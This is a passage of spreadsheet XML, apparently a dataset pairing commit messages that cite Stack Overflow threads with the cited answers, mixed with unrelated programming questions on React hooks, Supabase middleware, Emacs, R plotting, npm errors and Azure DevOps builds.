const Input = ({ innerRef }) =&gt; {
  return (
    &lt;div&gt;
      &lt;input ref={innerRef} /&gt;
    &lt;/div&gt;
  )
}</t>
  </si>
  <si>
    <t xml:space="preserve">We  have an application that has one or more text console windows that all essentially represent serial ports (text input and output, character by character).  These windows have turned into a major performance problem in the way they are currently code... we manage to spend a very significant chunk of time in them.
The current code is structured by having the window living its own little life, and the main application thread driving it across "SendMessage()" calls.  This message-passing seems to be the cause of incredible overhead. Basically, having a detour through the OS feels to be the wrong thing to do.
Note that we do draw text lines as a whole where appropriate, so that easy optimization is already done. 
I am not an expert in Windows coding, so I need to ask the community if there is some other architecture to drive the display of text in a window than sending messages like this?  It seems pretty heavyweight.
Note that this is in C++ or plain C, as the main application is a portable C/C++/some other languages program that also runs on Linux and Solaris.
We did some more investigations, seems that half of the overhead is preparing and sending each message using SendMessage, and the other half is the actual screen drawing. The SendMessage is done between functions in the same file...
So I guess all the advice given below is correct:
Look for how much things are redrawn
Draw things directly 
Chunk drawing operations in time, to not send every character to the screen, aiming for 10 to 20 Hz update rate of the serial console.
Can you accept ALL answers?
</t>
  </si>
  <si>
    <t>C373</t>
  </si>
  <si>
    <t>Prevent memory leak on unmounted component
https://stackoverflow.com/questions/53949393/cant-perform-a-react-state-update-on-an-unmounted-component</t>
  </si>
  <si>
    <t>Here is a React Hooks specific solution for
Error
Warning: Can't perform a React state update on an unmounted component.
Solution
You can declare let isMounted = true inside useEffect, which will be changed in the cleanup callback, as soon as the component is unmounted. Before state updates, you now check this variable conditionally:
useEffect(() =&gt; {
  let isMounted = true;               // note mutable flag
  someAsyncOperation().then(data =&gt; {
    if (isMounted) setState(data);    // add conditional check
  })
  return () =&gt; { isMounted = false }; // cleanup toggles value, if unmounted
}, []);                               // adjust dependencies to your needs
const Parent = () =&gt; {
  const [mounted, setMounted] = useState(true);
  return (
    &lt;div&gt;
      Parent:
      &lt;button onClick={() =&gt; setMounted(!mounted)}&gt;
        {mounted ? "Unmount" : "Mount"} Child
      &lt;/button&gt;
      {mounted &amp;&amp; &lt;Child /&gt;}
      &lt;p&gt;
        Unmount Child, while it is still loading. It won't set state later on,
        so no error is triggered.
      &lt;/p&gt;
    &lt;/div&gt;
  );
};
const Child = () =&gt; {
  const [state, setState] = useState("loading (4 sec)...");
  useEffect(() =&gt; {
    let isMounted = true;
    fetchData();
    return () =&gt; {
      isMounted = false;
    };
    // simulate some Web API fetching
    function fetchData() {
      setTimeout(() =&gt; {
        // drop "if (isMounted)" to trigger error again 
        // (take IDE, doesn't work with stack snippet)
        if (isMounted) setState("data fetched")
        else console.log("aborted setState on unmounted component")
      }, 4000);
    }
  }, []);
  return &lt;div&gt;Child: {state}&lt;/div&gt;;
};
ReactDOM.render(&lt;Parent /&gt;, document.getElementById("root"));
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/react/16.13.0/umd/react.production.min.js" integrity="sha256-32Gmw5rBDXyMjg/73FgpukoTZdMrxuYW7tj8adbN8z4=" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/react-dom/16.13.0/umd/react-dom.production.min.js" integrity="sha256-bjQ42ac3EN0GqK40pC9gGi/YixvKyZ24qMP/9HiGW7w=" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;div id="root"&gt;&lt;/div&gt;
&lt;script&gt;var { useReducer, useEffect, useState, useRef } = React&lt;/script&gt;
Extension: Custom useAsync Hook
We can encapsulate all the boilerplate into a custom Hook, that automatically aborts async functions in case the component unmounts or dependency values have changed before:
function useAsync(asyncFn, onSuccess) {
  useEffect(() =&gt; {
    let isActive = true;
    asyncFn().then(data =&gt; {
      if (isActive) onSuccess(data);
    });
    return () =&gt; { isActive = false };
  }, [asyncFn, onSuccess]);
}
// custom Hook for automatic abortion on unmount or dependency change
// You might add onFailure for promise errors as well.
function useAsync(asyncFn, onSuccess) {
  useEffect(() =&gt; {
    let isActive = true;
    asyncFn().then(data =&gt; {
      if (isActive) onSuccess(data)
      else console.log("aborted setState on unmounted component")
    });
    return () =&gt; {
      isActive = false;
    };
  }, [asyncFn, onSuccess]);
}
const Child = () =&gt; {
  const [state, setState] = useState("loading (4 sec)...");
  useAsync(simulateFetchData, setState);
  return &lt;div&gt;Child: {state}&lt;/div&gt;;
};
const Parent = () =&gt; {
  const [mounted, setMounted] = useState(true);
  return (
    &lt;div&gt;
      Parent:
      &lt;button onClick={() =&gt; setMounted(!mounted)}&gt;
        {mounted ? "Unmount" : "Mount"} Child
      &lt;/button&gt;
      {mounted &amp;&amp; &lt;Child /&gt;}
      &lt;p&gt;
        Unmount Child, while it is still loading. It won't set state later on,
        so no error is triggered.
      &lt;/p&gt;
    &lt;/div&gt;
  );
};
const simulateFetchData = () =&gt; new Promise(
  resolve =&gt; setTimeout(() =&gt; resolve("data fetched"), 4000));
ReactDOM.render(&lt;Parent /&gt;, document.getElementById("root"));
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/react/16.13.0/umd/react.production.min.js" integrity="sha256-32Gmw5rBDXyMjg/73FgpukoTZdMrxuYW7tj8adbN8z4=" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;script src="https://cdnjs.cloudflare.com/ajax/libs/react-dom/16.13.0/umd/react-dom.production.min.js" integrity="sha256-bjQ42ac3EN0GqK40pC9gGi/YixvKyZ24qMP/9HiGW7w=" crossorigin="anonymous"&gt;&lt;/script&gt;
&lt;div id="root"&gt;&lt;/div&gt;
&lt;script&gt;var { useReducer, useEffect, useState, useRef } = React&lt;/script&gt;
More on effect cleanups: Overreacted: A Complete Guide to useEffect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to install the google signin package but I get an error upon installation even after following their documentation
&lt;a href="https://react-native-google-signin.github.io/docs/install?package-manager=npm" rel="nofollow noreferrer"&gt;DOCS&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In my .npmrc file&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;//npm.pkg.github.com/:_authToken=${AUTH_TOKEN}
@react-native-google-signin:registry=https://npm.pkg.github.com/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But when I run
&lt;code&gt;npm i @react-native-google-signin/google-signin@latest&lt;/code&gt;
I get the error&lt;/p&gt;
&lt;p&gt;npm ERR! code E403
npm ERR! 403 403 Forbidden - GET &lt;a href="https://npm.pkg.github.com/@react-native-google-signin%2fgoogle-signin" rel="nofollow noreferrer"&gt;https://npm.pkg.github.com/@react-native-google-signin%2fgoogle-signin&lt;/a&gt; - Permission permission_denied: read_package
npm ERR! 403 In most cases, you or one of your dependencies are requesting
npm ERR! 403 a package version that is forbidden by your security policy, or
npm ERR! 403 on a server you do not have access to.&lt;/p&gt;
&lt;p&gt;npm ERR! A complete log of this run can be found in: C:\npm-cache_logs\2025-02-19T20_40_18_317Z-debug-0.log&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C374</t>
  </si>
  <si>
    <t xml:space="preserve"> Convert Home to class component
Use `withStyles` in place of `useStyles`: https://stackoverflow.com/questions/56554586/how-to-use-usestyle-to-style-class-component-in-material-ui</t>
  </si>
  <si>
    <t>You can do it like this:
import { withStyles } from "@material-ui/core/styles";
const styles = theme =&gt; ({
  root: {
    backgroundColor: "red"
  }
});
class ClassComponent extends Component {
  state = {
    searchNodes: ""
  };
  render() {
    const { classes } = this.props;
    return (
      &lt;div className={classes.root}&gt;Hello!&lt;/div&gt;
    );
  }
}
export default withStyles(styles, { withTheme: true })(ClassComponent);
Just ignore the
withTheme: true
if you aren't using a theme.
To get this working in TypeScript, a few changes are needed:
import { createStyles, withStyles, WithStyles } from "@material-ui/core/styles";
const styles = theme =&gt; createStyles({
  root: {
    backgroundColor: "red"
  }
});
interface Props extends WithStyles&lt;typeof styles&gt;{ }
class ClassComponent extends Component&lt;Props&gt; {
// the rest of the code stays the same</t>
  </si>
  <si>
    <t xml:space="preserve">Even if you are using Agile, you would need a high level architecture before you can start implementing the project. 
By high level architecture, I mean dividing project into small parts, infrastructure stuff, distributed/web-based/thick client etc...
Are there any books/articles on this topic??
</t>
  </si>
  <si>
    <t>C375</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am building a dashboard in NextJS, using Supabase for user auth. I am trying to protect my /dashboard route if a user is not signed in. the Supabase boilerplate has checks for if the user is not signed in, but I can still access /dashboard by typing it in the url even if a user is not signed in. In my middleware.ts and /utils/supabase/middleware.ts, I am logging just to see if the middleware is being hit, but nothing is being logged. Below is my project structure, my middleware.ts, and my /utils/supabase/middleware.ts.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/D1QKGH4E.png" rel="nofollow noreferrer"&gt;project structure&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;// src/app/utils/supabase/middleware.ts
import { createServerClient } from '@supabase/ssr'
import { NextResponse, type NextRequest } from 'next/server'
import { redirect } from 'next/navigation'
export async function updateSession(request: NextRequest) {
  console.log("Middleware running for:", request.nextUrl.pathname);
  let supabaseResponse = NextResponse.next({
    request,
  })
  const supabase = createServerClient(
    process.env.NEXT_PUBLIC_SUPABASE_URL!,
    process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY!,
    {
      cookies: {
        getAll() {
          return request.cookies.getAll()
        },
        setAll(cookiesToSet) {
          cookiesToSet.forEach(({ name, value, options }) =&amp;gt; request.cookies.set(name, value))
          supabaseResponse = NextResponse.next({
            request,
          })
          cookiesToSet.forEach(({ name, value, options }) =&amp;gt;
            supabaseResponse.cookies.set(name, value, options)
          )
        },
      },
    }
  )
  // Do not run code between createServerClient and
  // supabase.auth.getUser(). A simple mistake could make it very hard to debug
  // issues with users being randomly logged out.
  // IMPORTANT: DO NOT REMOVE auth.getUser()
  const {
    data: { user },
  } = await supabase.auth.getUser()
  **if (
    !user &amp;amp;&amp;amp;
    !request.nextUrl.pathname.startsWith('/login') &amp;amp;&amp;amp;
    !request.nextUrl.pathname.startsWith('/dashboard')
  ) {
    // no user, potentially respond by redirecting the user to the login page
    const url = request.nextUrl.clone()
    url.pathname = '/login'
    return NextResponse.redirect(url)
  }**
  // IMPORTANT: You *must* return the supabaseResponse object as it is.
  // If you're creating a new response object with NextResponse.next() make sure to:
  // 1. Pass the request in it, like so:
  //    const myNewResponse = NextResponse.next({ request })
  // 2. Copy over the cookies, like so:
  //    myNewResponse.cookies.setAll(supabaseResponse.cookies.getAll())
  // 3. Change the myNewResponse object to fit your needs, but avoid changing
  //    the cookies!
  // 4. Finally:
  //    return myNewResponse
  // If this is not done, you may be causing the browser and server to go out
  // of sync and terminate the user's session prematurely!
  return supabaseResponse
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
&lt;p&gt;&lt;div class="snippet" data-lang="js" data-hide="false" data-console="true" data-babel="false" data-babel-preset-react="false" data-babel-preset-ts="false"&gt;_x000D_
&lt;div class="snippet-code"&gt;_x000D_
&lt;pre class="snippet-code-js lang-js prettyprint-override"&gt;&lt;code&gt;//src/app/middleware.ts
import { type NextRequest } from 'next/server'
import { updateSession } from "./utils/supabase/middleware";
export async function middleware(request: NextRequest) {
  console.log("middleware is running")
  return await updateSession(request)
}
export const config = {
  matcher: [
    /*
     * Match all request paths except for the ones starting with:
     * - _next/static (static files)
     * - _next/image (image optimization files)
     * - favicon.ico (favicon file)
     * Feel free to modify this pattern to include more paths.
     */
    '/((?!_next/static|_next/image|favicon.ico|.*\\.(?:svg|png|jpg|jpeg|gif|webp)$).*)',
  ],
}&lt;/code&gt;&lt;/pre&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/div&gt;_x000D_
&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C376</t>
  </si>
  <si>
    <t>[ issue 1061 ] Reuse existing window displaying agda2-info-buffer even when it is not in the raised frame.
Credits to Iqbal Ansari at http://stackoverflow.com/questions/21955162/emacs-how-to-display-a-buffer-without-switching-window-and-without-raising-fram</t>
  </si>
  <si>
    <t>If I understood you question correctly the following function will do what you want
(defun my-switch-to-buffer (buffer)
  (interactive
   (list (ido-read-buffer "Switch to buffer: ")))
  ;; get-buffer-window (with second argument t) will return
  ;; nil if the buffer is not open in any window across any
  ;; frame
  (unless (get-buffer-window buffer 0)
    (pop-to-buffer buffer nil t)))</t>
  </si>
  <si>
    <t xml:space="preserve">In a reporting application, Is it possible to abstract reporting logic and the database schema details? 
I have a Reporting Services application with a reasonably complex reporting logic, I am trying to migrate the application to some other databases. (Databases that are built for the same purpose but developed by different software-houses. ) 
Is it a wise decision to use a web services / WCF layer in the middle? What else options can be considered?
</t>
  </si>
  <si>
    <t>C377</t>
  </si>
  <si>
    <t>element component font-family issue
https://stackoverflow.com/questions/52050877/element-ui-font-family-differencies-between-components</t>
  </si>
  <si>
    <t>I was facing a similar issue, if you are using webpack, one of the options is to add the following code when importing element UI:
import 'element-ui/lib/theme-chalk/reset.css'
You will find the original answer here:
https://forum.vuejs.org/t/elementui-styling-is-not-applied-to-new-webpack-element-ui-project/26194/9</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tracked points (head, abdomen of an ant) from video manually and graphed the x and y coordinates of the head and abdomen, as well as its center through time (the length of a jump). I also tracked the points automatically using a function, imageToXY. I need to overlay these two graphs to compare but they have different min and max values on the x and y axes so I need to shift one graph over (preferably the manual one) to start at 0 for x and y.&lt;/p&gt;
&lt;p&gt;Code for separate manual graph and automatic graph:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;str(abdomen_final$X)
str(abdomen_final$Y)
str(head_final$X)
str(head_final$Y)
headx=head_final$X
heady=head_final$Y
abx=abdomen_final$X
aby=abdomen_final$Y
plotAnt &amp;lt;- function(headx, heady, abx, aby) {
  # Flip y values from images
  heady = -heady
  aby = -aby
  # Setup center calcs
  centerx &amp;lt;- rep(0, length(headx))
  centery &amp;lt;- centerx
  # Calculate center
  for (i in 1:length(headx)) {
    centerx[i] = (headx[i] + abx[i]) / 2
    centery[i] = (heady[i] + aby[i]) / 2
  }
  # Adjust y-values
  yadjustment = centery[1]
  heady = heady - yadjustment
  aby = aby - yadjustment
  centery = centery - yadjustment
  # Adjust x-values
  xadjustment = centerx[1]
  headx = headx - xadjustment
  abx = abx - xadjustment
  centerx = centerx - xadjustment
  # Set up the plot window
  plot(x = centerx[1], y = centery[1], type = &amp;quot;n&amp;quot;, 
       xlim = c(min(c(headx, abx)), max(c(headx, abx))),
       ylim = c(min(c(heady, aby)), max(c(heady, aby))),
       main = &amp;quot;Trap-jaw Ant Trajectory&amp;quot;,
       xlab = &amp;quot;Horizontal Distance (cm)&amp;quot;, ylab = &amp;quot;Vertical Distance (cm)&amp;quot;)
  # Animation
  for (i in 1:length(heady)) {
    # Ensure the plot updates
    plot.new()
    # Plot the trajectory
    plot(x = centerx[1:i], y = centery[1:i], type = &amp;quot;l&amp;quot;, lwd = 3,
         xlim = c(min(c(headx, abx)), max(c(headx, abx))),
         ylim = c(min(c(heady, aby)), max(c(heady, aby))),
         main = &amp;quot;Trap-jaw Ant Trajectory&amp;quot;,
         xlab = &amp;quot;Horizontal Distance (cm)&amp;quot;, ylab = &amp;quot;Vertical Distance (cm)&amp;quot;)
    # Add lines for head and abdomen
    lines(x = c(headx[i], abx[i]), y = c(heady[i], aby[i]), col = &amp;quot;blue&amp;quot;, lwd = 2)
    points(x = headx[1:i], y = heady[1:i], col = &amp;quot;blue&amp;quot;, pch = 20)
    points(x = abx[1:i], y = aby[1:i], col = &amp;quot;red&amp;quot;, pch = 20)
    # Delay to simulate animation
    Sys.sleep(0.1)
  }
  # Return center coordinates
  data.frame(x = centerx, y = centery)
}
plotAnt(headx=headx, heady=heady, abx=abx, aby=aby)
antPath &amp;lt;- plotAnt(headx, heady, abx, aby);antPath
install.packages(&amp;quot;jpeg&amp;quot;)   # For readJPEG function
library(jpeg)
ant1 &amp;lt;-readJPEG(&amp;quot;/Users/henryadamson/Desktop/lab04/antJumpAutomatic/ant_0001.jpeg&amp;quot;); ant1
automateAnt &amp;lt;- function(){
  filenames &amp;lt;- grep(pattern=&amp;quot;jpeg&amp;quot;, x=list.files(),value=T)
  x.centroid &amp;lt;- rep(0, length(filenames))
  y.centroid &amp;lt;- rep(0, length(filenames))
  require(jpeg)
  for(i in 1:length(filenames)){
    cat(&amp;quot;processing frame &amp;quot;,i, &amp;quot; of &amp;quot;, length(filenames),&amp;quot;\n&amp;quot;)
    readJPEG(filenames[i]) -&amp;gt; tempAnt
    imageToXY(tempAnt) -&amp;gt; tempAnt.xy
    x.centroid[i] &amp;lt;- mean(tempAnt.xy$x)
    y.centroid[i] &amp;lt;- mean(tempAnt.xy$y)
  }
  data.frame(x.centroid=x.centroid, y.centroid=y.centroid)
}
imageToXY &amp;lt;- function(image, plot=F){
  x=NULL
  y=NULL
  for(row in 1:nrow(image)){
    tempCols &amp;lt;- which(image[row,]&amp;lt;=1 &amp;amp; image[row,]&amp;gt;0)
    x &amp;lt;- c(x, tempCols)
    y &amp;lt;- c(y, rep(row, length(tempCols)))
  }
  y &amp;lt;- 1024-y
  if(plot)
    plot(x=x, y=y, pch=20, xlim=c(0,1024), ylim=c(0,1024))
  data.frame(x=x,y=y)
}
ant1.xy &amp;lt;- imageToXY(image=ant1,plot=T)
ant1.xy
# Calculate the mean of the x and y coordinates separately
mean_x &amp;lt;- mean(ant1.xy$x)
mean_y &amp;lt;- mean(ant1.xy$y)
# Print the results
mean_x
mean_y
ant100 &amp;lt;-readJPEG(&amp;quot;/Users/henryadamson/Desktop/lab04/antJumpAutomatic/ant_0100.jpeg&amp;quot;); ant100
automateAnt &amp;lt;- function(){
  filenames &amp;lt;- grep(pattern=&amp;quot;jpeg&amp;quot;, x=list.files(),value=T)
  x.centroid &amp;lt;- rep(0, length(filenames))
  y.centroid &amp;lt;- rep(0, length(filenames))
  require(jpeg)
  for(i in 1:length(filenames)){
    cat(&amp;quot;processing frame &amp;quot;,i, &amp;quot; of &amp;quot;, length(filenames),&amp;quot;\n&amp;quot;)
    readJPEG(filenames[i]) -&amp;gt; tempAnt
    imageToXY(tempAnt) -&amp;gt; tempAnt.xy
    x.centroid[i] &amp;lt;- mean(tempAnt.xy$x)
    y.centroid[i] &amp;lt;- mean(tempAnt.xy$y)
  }
  data.frame(x.centroid=x.centroid, y.centroid=y.centroid)
}
imageToXY &amp;lt;- function(image, plot=F){
  x=NULL
  y=NULL
  for(row in 1:nrow(image)){
    tempCols &amp;lt;- which(image[row,]&amp;lt;=1 &amp;amp; image[row,]&amp;gt;0)
    x &amp;lt;- c(x, tempCols)
    y &amp;lt;- c(y, rep(row, length(tempCols)))
  }
  y &amp;lt;- 1024-y
  if(plot)
    plot(x=x, y=y, pch=20, xlim=c(0,1024), ylim=c(0,1024))
  data.frame(x=x,y=y)
}
ant100.xy &amp;lt;- imageToXY(image=ant100,plot=T)
ant100.xy
# Calculate the mean of the x and y coordinates separately
mean_x &amp;lt;- mean(ant100.xy$x)
mean_y &amp;lt;- mean(ant100.xy$y)
# Print the results
mean_x
mean_y
ant400 &amp;lt;-readJPEG(&amp;quot;/Users/henryadamson/Desktop/lab04/antJumpAutomatic/ant_0400.jpeg&amp;quot;); ant400
automateAnt &amp;lt;- function(){
  filenames &amp;lt;- grep(pattern=&amp;quot;jpeg&amp;quot;, x=list.files(),value=T)
  x.centroid &amp;lt;- rep(0, length(filenames))
  y.centroid &amp;lt;- rep(0, length(filenames))
  require(jpeg)
  for(i in 1:length(filenames)){
    cat(&amp;quot;processing frame &amp;quot;,i, &amp;quot; of &amp;quot;, length(filenames),&amp;quot;\n&amp;quot;)
    readJPEG(filenames[i]) -&amp;gt; tempAnt
    imageToXY(tempAnt) -&amp;gt; tempAnt.xy
    x.centroid[i] &amp;lt;- mean(tempAnt.xy$x)
    y.centroid[i] &amp;lt;- mean(tempAnt.xy$y)
  }
  data.frame(x.centroid=x.centroid, y.centroid=y.centroid)
}
imageToXY &amp;lt;- function(image, plot=F){
  x=NULL
  y=NULL
  for(row in 1:nrow(image)){
    tempCols &amp;lt;- which(image[row,]&amp;lt;=1 &amp;amp; image[row,]&amp;gt;0)
    x &amp;lt;- c(x, tempCols)
    y &amp;lt;- c(y, rep(row, length(tempCols)))
  }
  y &amp;lt;- 1024-y
  if(plot)
    plot(x=x, y=y, pch=20, xlim=c(0,1024), ylim=c(0,1024))
  data.frame(x=x,y=y)
}
ant400.xy &amp;lt;- imageToXY(image=ant400,plot=T)
ant400.xy
# Calculate the mean of the x and y coordinates separately
mean_x &amp;lt;- mean(ant400.xy$x)
mean_y &amp;lt;- mean(ant400.xy$y)
# Print the results
mean_x
mean_y
ant700 &amp;lt;-readJPEG(&amp;quot;/Users/henryadamson/Desktop/lab04/antJumpAutomatic/ant_0700.jpeg&amp;quot;); ant700
automateAnt &amp;lt;- function(){
  filenames &amp;lt;- grep(pattern=&amp;quot;jpeg&amp;quot;, x=list.files(),value=T)
  x.centroid &amp;lt;- rep(0, length(filenames))
  y.centroid &amp;lt;- rep(0, length(filenames))
  require(jpeg)
  for(i in 1:length(filenames)){
    cat(&amp;quot;processing frame &amp;quot;,i, &amp;quot; of &amp;quot;, length(filenames),&amp;quot;\n&amp;quot;)
    readJPEG(filenames[i]) -&amp;gt; tempAnt
    imageToXY(tempAnt) -&amp;gt; tempAnt.xy
    x.centroid[i] &amp;lt;- mean(tempAnt.xy$x)
    y.centroid[i] &amp;lt;- mean(tempAnt.xy$y)
  }
  data.frame(x.centroid=x.centroid, y.centroid=y.centroid)
}
imageToXY &amp;lt;- function(image, plot=F){
  x=NULL
  y=NULL
  for(row in 1:nrow(image)){
    tempCols &amp;lt;- which(image[row,]&amp;lt;=1 &amp;amp; image[row,]&amp;gt;0)
    x &amp;lt;- c(x, tempCols)
    y &amp;lt;- c(y, rep(row, length(tempCols)))
  }
  y &amp;lt;- 1024-y
  if(plot)
    plot(x=x, y=y, pch=20, xlim=c(0,1024), ylim=c(0,1024))
  data.frame(x=x,y=y)
}
ant700.xy &amp;lt;- imageToXY(image=ant700,plot=T)
ant700.xy
# Calculate the mean of the x and y coordinates separately
mean_x &amp;lt;- mean(ant700.xy$x)
mean_y &amp;lt;- mean(ant700.xy$y)
# Print the results
mean_x
mean_y
antPath_auto&amp;lt;- automateAnt()
centroidx=antPath_auto$x.centroid/87.5
centroidy=antPath_auto$y.centroid/87.5
plotAnt &amp;lt;- function(centroidx, centroidy) {
  plot(x = centroidx, y = centroidy, type = &amp;quot;n&amp;quot;, 
       xlim = c(min(centroidx), max(centroidx)),
       ylim = c(min(centroidy), max(centroidy)),
       main = &amp;quot;Automated Trap-jaw Ant Trajectory&amp;quot;,
       xlab = &amp;quot;Horizontal Distance (cm)&amp;quot;, ylab = &amp;quot;Vertical Distance (cm)&amp;quot;)
  # Animation
  for (i in 1:length(centroidy)) {
    # Ensure the plot updates
    plot.new()
    # Plot the trajectory
    plot(x = centroidx[1:i], y = centroidy[1:i], type = &amp;quot;l&amp;quot;, lwd = 3,
         xlim = c(min(centroidx), max(centroidx)),
         ylim = c(min(centroidy), max(centroidy)),
         main = &amp;quot;Automated Trap-jaw Ant Trajectory&amp;quot;,
         xlab = &amp;quot;Horizontal Distance (cm)&amp;quot;, ylab = &amp;quot;Vertical Distance (cm)&amp;quot;)
    # Add lines for head and abdomen
    # Corrected lines function call
    lines(x = centroidx, y = centroidy, col = &amp;quot;blue&amp;quot;, lwd = 2)
    points(x = centroidx[1:i], y = centroidy[1:i], col = &amp;quot;red&amp;quot;, pch = 20)
    # Delay to simulate animation
    Sys.sleep(0.1)
  }
  # Return center coordinates
  data.frame(x = centroidx, y = centroidy)
}
plotAnt(centroidx=centroidx, centroidy=centroidy)
antPath &amp;lt;- plotAnt(centroidx, centroidy);antPath
automateAnt &amp;lt;- function(){
  filenames &amp;lt;- grep(pattern=&amp;quot;jpeg&amp;quot;, x=list.files(),value=T)
  x.centroid &amp;lt;- rep(0, length(filenames))
  y.centroid &amp;lt;- rep(0, length(filenames))
  require(jpeg)
  for(i in 1:length(filenames)){
    cat(&amp;quot;processing frame &amp;quot;,i, &amp;quot; of &amp;quot;, length(filenames),&amp;quot;\n&amp;quot;)
    readJPEG(filenames[i]) -&amp;gt; tempAnt
    imageToXY(tempAnt) -&amp;gt; tempAnt.xy
    x.centroid[i] &amp;lt;- mean(tempAnt.xy$x)
    y.centroid[i] &amp;lt;- mean(tempAnt.xy$y)
  }
  data.frame(x.centroid=x.centroid, y.centroid=y.centroid)
}
imageToXY &amp;lt;- function(image, plot=F){
  x=NULL
  y=NULL
  for(row in 1:nrow(image)){
    tempCols &amp;lt;- which(image[row,]&amp;lt;=1 &amp;amp; image[row,]&amp;gt;0)
    x &amp;lt;- c(x, tempCols)
    y &amp;lt;- c(y, rep(row, length(tempCols)))
  }
  y &amp;lt;- 1024-y
  if(plot)
    plot(x=x, y=y, pch=20, xlim=c(0,1024), ylim=c(0,1024))
  data.frame(x=x,y=y)
}
antPath_auto&amp;lt;- automateAnt()
centroidx=antPath_auto$x.centroid/87.5
centroidy=antPath_auto$y.centroid/87.5
plotAnt &amp;lt;- function(centroidx, centroidy) {
   plot(x = centroidx, y = centroidy, type = &amp;quot;n&amp;quot;, 
       xlim = c(min(centroidx), max(centroidx)),
       ylim = c(min(centroidy), max(centroidy)),
       main = &amp;quot;Automated Trap-jaw Ant Trajectory&amp;quot;,
       xlab = &amp;quot;Horizontal Distance (cm)&amp;quot;, ylab = &amp;quot;Vertical Distance (cm)&amp;quot;)
  # Animation
  for (i in 1:length(centroidy)) {
    # Ensure the plot updates
    plot.new()
    # Plot the trajectory
    plot(x = centroidx[1:i], y = centroidy[1:i], type = &amp;quot;l&amp;quot;, lwd = 3,
         xlim = c(min(centroidx), max(centroidx)),
         ylim = c(min(centroidy), max(centroidy)),
         main = &amp;quot;Automated Trap-jaw Ant Trajectory&amp;quot;,
         xlab = &amp;quot;Horizontal Distance (cm)&amp;quot;, ylab = &amp;quot;Vertical Distance (cm)&amp;quot;)
    # Add lines for head and abdomen
    # Corrected lines function call
    lines(x = centroidx, y = centroidy, col = &amp;quot;blue&amp;quot;, lwd = 2)
    points(x = centroidx[1:i], y = centroidy[1:i], col = &amp;quot;red&amp;quot;, pch = 20)
    # Delay to simulate animation
    Sys.sleep(0.1)
  }
  # Return center coordinates
  data.frame(x = centroidx, y = centroidy)
}
plotAnt(centroidx=centroidx, centroidy=centroidy)
antPath &amp;lt;- plotAnt(centroidx, centroidy);antPath
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C378</t>
  </si>
  <si>
    <t>frontend: Don't use toLocaleString to generate date for tests
refer https://stackoverflow.com/questions/40935886/components-using-date-objects-produce-different-snapshots-in-different-timezones</t>
  </si>
  <si>
    <t>I struggled with this for hours/days and only this worked for me:
1) In your test:
Date.now = jest.fn(() =&gt; new Date(Date.UTC(2017, 7, 9, 8)).valueOf())
2) Then change the
TZ
env var before running your tests.
So the script in my package.json:
(
Mac &amp; Linux only
)
"test": "TZ=America/New_York react-scripts test --env=jsdom",
(
Windows
)
"test": "set TZ=America/New_York &amp;&amp; react-scripts test --env=jsdom",</t>
  </si>
  <si>
    <t xml:space="preserve">Or any other design that has the gui widgets as being the first port of call where an unhandled exception will kill the app?
We all want one main: "catch all" for face saving purposes (although in most cases this shouldn't have a "continue" feature) but it is impossible to easily implement one with gui widgets that are the first port of call. Is this design flawed or am I missing a trick somewhere?
I ask this because I was reading an [external-link] by the designer of the language and he stated that Exception handling should be centralised and the first thing that popped into my head was the WinForm event mechanism where this becomes difficult.
Were the WinForm/GUI team listening to him, or was it possibly too late by then?
</t>
  </si>
  <si>
    <t>C379</t>
  </si>
  <si>
    <t>Fix component names where hooks are used
C.f.: https://stackoverflow.com/questions/60818313/react-hook-useeffect-is-called-in-function-shoes-which-is-neither-a-react-fu</t>
  </si>
  <si>
    <t>As described
here
, React component names need to start with
a capital letter
.
That's because React treats components starting with a lowercase letter as DOM tags.
Therefore you should name it
Shoes
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In Azure DevOps, I started getting this error in a build step which uploads symbols to a symbol server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Symbol App][ERROR]   2025-02-19T20:33:27.1481800+00:00  Microsoft.VisualStudio.Services.Common.VssServiceException: TF401444: Please sign-in at least once as [guid]\[guid]\[guid] in a web browser to enable access to the service.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Where should I sign into? As what? How often would I need to do this manual step for an automated build process?&lt;/p&gt;
&lt;p&gt;This is the YAML of the build step:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- task: PublishSymbols@2
  displayName: 'Publish symbols (*.pdb) to symbol server'
  inputs:
    ConnectedServiceName: '[my service connection name]'
    SymbolsFolder: '$(Build.SourcesDirectory)/[my build directory]'
    SearchPattern: '*.pdb'
    IndexSources: false
    SymbolServerType: TeamServices
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Possibly relevant: I recently changed the build to use a new service connection that uses workload identity federation. I'm not 100% sure that's the issue, because it did build successfully with the new service connection for several months, and if I now try to switch back to the older service connection (just for this failing step), it still fails.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://stackoverflow.com/a/77140319"&gt;This answer&lt;/a&gt; suggests using an environment variable, but that isn't available for this task.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C38</t>
  </si>
  <si>
